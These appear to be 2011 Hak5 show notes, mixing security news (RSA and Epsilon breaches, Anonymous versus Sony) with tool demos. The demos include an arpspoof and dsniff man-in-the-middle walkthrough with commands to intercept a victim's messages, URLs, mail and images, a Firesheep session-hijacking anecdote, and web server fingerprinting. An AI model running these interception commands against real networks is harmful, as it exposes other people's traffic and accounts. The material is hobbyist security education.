Hak5

Jailbreaking is fun! RedSn0w has just been released by the DevTeam as a nice and easy untethered jailbreak for iOS 4.3.1. It's available on Windows and OSX for all your Apple devices, except for the iPad 2 because apparently the security on the new tablet has been beefed up. But, I'm sure it won't take long for someone to figure out a way around it.

While we typically don't follow the hijinks of Anonymous, the group has recently targeted Sony's PlayStation.com with a Denial of service attack that left the website periodically inaccessible. The group released a manifesto announcing operation Sony and pronounced the GeoHot lawsuit as an "unforgivable offense against free speech and internet freedom, primary sources of free lulz". Sony later tweeted that the PSN may be inaccessible due to "sporadic maintenance"

If you get some spam very soon in your inbox, it may be because of a security breach at Epsilon. Epsilon, the world's largest email marketing service, says the only information hackers got were names and email addresses. I've gotten several emails from companies so far, all saying the same thing- "your e-mail address may have been exposed by unauthorized entry into Epsilon's system bla bla bla"- but this still means we're more vulnerable to phishing scams and such. So, be aware and don't give out your info to any weird emails.

RSA recently outlined how their network was compromised in the much publicized attack on their network weeks ago. Over a 2-day period attackers sent two different phishing emails to employees with subjects like "2011 Recruitment Plan" which contained an attached excel spreadsheet. The spreadsheet contained a zero-day exploit that took advantage of an Adobe Flash vulnerability. From there the attacker installed a customized version of the Poison Ivy RAT and began escalating privileges across the network. The Flash vulnerability has since been patched and RSA claims that the seeds used to generate RSA keys have not been compromised.

Just plain awesome! You remember the Commodore 64? Of course you do! Well apparently, Commodore USA is coming out with a brand spankin new C64 with some nice PC specs, with advertisements along side the release of Tron: Legacy on DVD. No details on the specs just yet, but I'll be checking back on their website to find out more...

Do you have what it takes to compete in our Crack The Code Challenge -- brought to you by GoToAssist Express? Test your skills in our private lab network and bid for the title supreme leet hax0r. Winners will be featured on a future episode of Hak5!

Our next event will be this Sunday, April 24th at 3pm Pacific. Visit Hak5.org/challenge for all of the details. We'll be live streaming at hak5.org/live throughout the day. See you there!

Recently we've been having a lot of fun with man in the middle attacks. Shannon showed how to perform an arp cache poisoning attack on Windows using Cain & Abel. I showed how to detect the attack using XARP. She showed off sidejacking with Firesheep. Honestly eavesdropping is just plain fun. So this week I'd like to demo a couple of tools for us linux folks.

Again the premise is all the same. We'll be using command line tools to tell our victim we're the router, and vise versa.

The tools we'll be using are the dsniff suite and driftnet. If you don't already have 'em and you're rocking Ubuntu it's simply a matter of issuing sudo apt-get install driftnet dsniff.

Before we get our attack started we'll need to enable packet forwarding. This means we'll allow the traffic of our targets to flow through our machine.

cat /proc/sys/net/ipv4/ip_forward echo 1 > /proc/sys/net/ipv4/ip_forward cat /proc/sys/net/ipv4/ip_forward screen arpspoof -t 10.13.37.1 10.13.37.124 arpspoof -t 10.13.37.1 10.13.37.124 msgsnarf -i eth0 urlsnart -i eth0 mailsnarf -i eth0 driftnet -i eth0 killall arpspoof

Last week's trivia question was: What is this prototype built in 1998 that encrypts telephone calls using the symmetric encryption algorithm IDEA? The answer was Cryptophon.

This week's trivia question is: What is the name of this prominent computer club that was founded in Berlin in 1981?

Answer at hak5.org/trivia for a chance to win some swag!

On a recent episode, I walked you through how to use FireSheep to hijack another computer's session on your wireless network. I was able to see Darren log onto Twitter, click on his username, and write on his twitter account as @hak5darren, not @snubs. Haha, I just hacked his twitter, right?

Well, today, I'd like to show you BlackSheep, which does the exact opposite. If FireSheep is being used by someone on your network, you can be warned and block against it. BlackSheep is a Firefox add-on, just like FireSheep, that was based right off the same source code. So it reuses the same network listening back-end and that same list of sites and corresponding cookies, etc. By doing this, it ensure that the fake traffic generated by BlackSheep is what FireSheep is expecting to see. BlackSheep even will show you the IP address of the person's computer trying to hijack your account.

Now to get it working. First, download the BlackSheep add-on. Disable FireSheep if you have it as well, so BlackSheep doesn't detect it.

In the options menu, choose the interval you want BlackSheep to create fake traffic. It's default is 5 minutes which works fine. Click ok and you're done configuring. Now, if FireSheep is detected on your network, you'll see this popup on your screen.

BlackSheep is available for Mac, Windows, and Linux. You still need WinPCap if you're on Windows and it only works with the Firefox, and only 32-bit.

Although BlackSheep does help with FireSheep, you should still be using HTTPS for your surfing.

Download Blacksheep

Wayno from pkill-9 sent this by. Two quick and dirty ways to ID a web server.

First:

curl -I www.hak5.org

Should result in:

HTTP/1.1 200 OK
Date: Tue, 05 Apr 2011 01:00:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Last-Modified: Tue, 05 Apr 2011 00:04:06 GMT
Accept-Ranges: bytes
Content-Length: 66982
X-Pingback: http://www.Hak5.org/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Vary: Accept-Encoding,Cookie
Content-Type: text/html; charset=UTF-8

The second, geekier way is to do it with telnet.

telnet www.hak5.org 80
HEAD / HTTP/1.0 

Want to share your tips with us? tips@hak5.org

Steve writes:

Thank you so much for the info you have been giving out on screen, and multiplexing screens! I just wanted to make you aware, if you weren't already, of PuTTY Connection Mamager. The most reported feature is the tabbed interface for PuTTY, but for me the best feature is the screen splitting. I can have one window with all of my putty sessions open and arranged how I want. Also, you can send commands to all viewable putty sessions, so I can run one command on each of my servers at the same time.

Nick writes:

target="_blank">Gpredict is a real-time satellite tracking and orbit prediction application, and it actually runs better on my WinblowsXP than it does on my many Ubuntu (10.4,10.10,and bt4R2) laptops. It's really cool, I happen to be a Telecommunications/SatCom guy and this software is really neat because it has all the satellites orbit locations pre-loaded and after you put in your geo coordinates it will tell you when the satellite will be visible and at what Azimuth and Elevation you should be using to see the beacon (via spectrum analyzer)... And if you have no idea what I'm saying: You can select all the military satellites from a drop down list and watch them move over the globe... NEAT!!!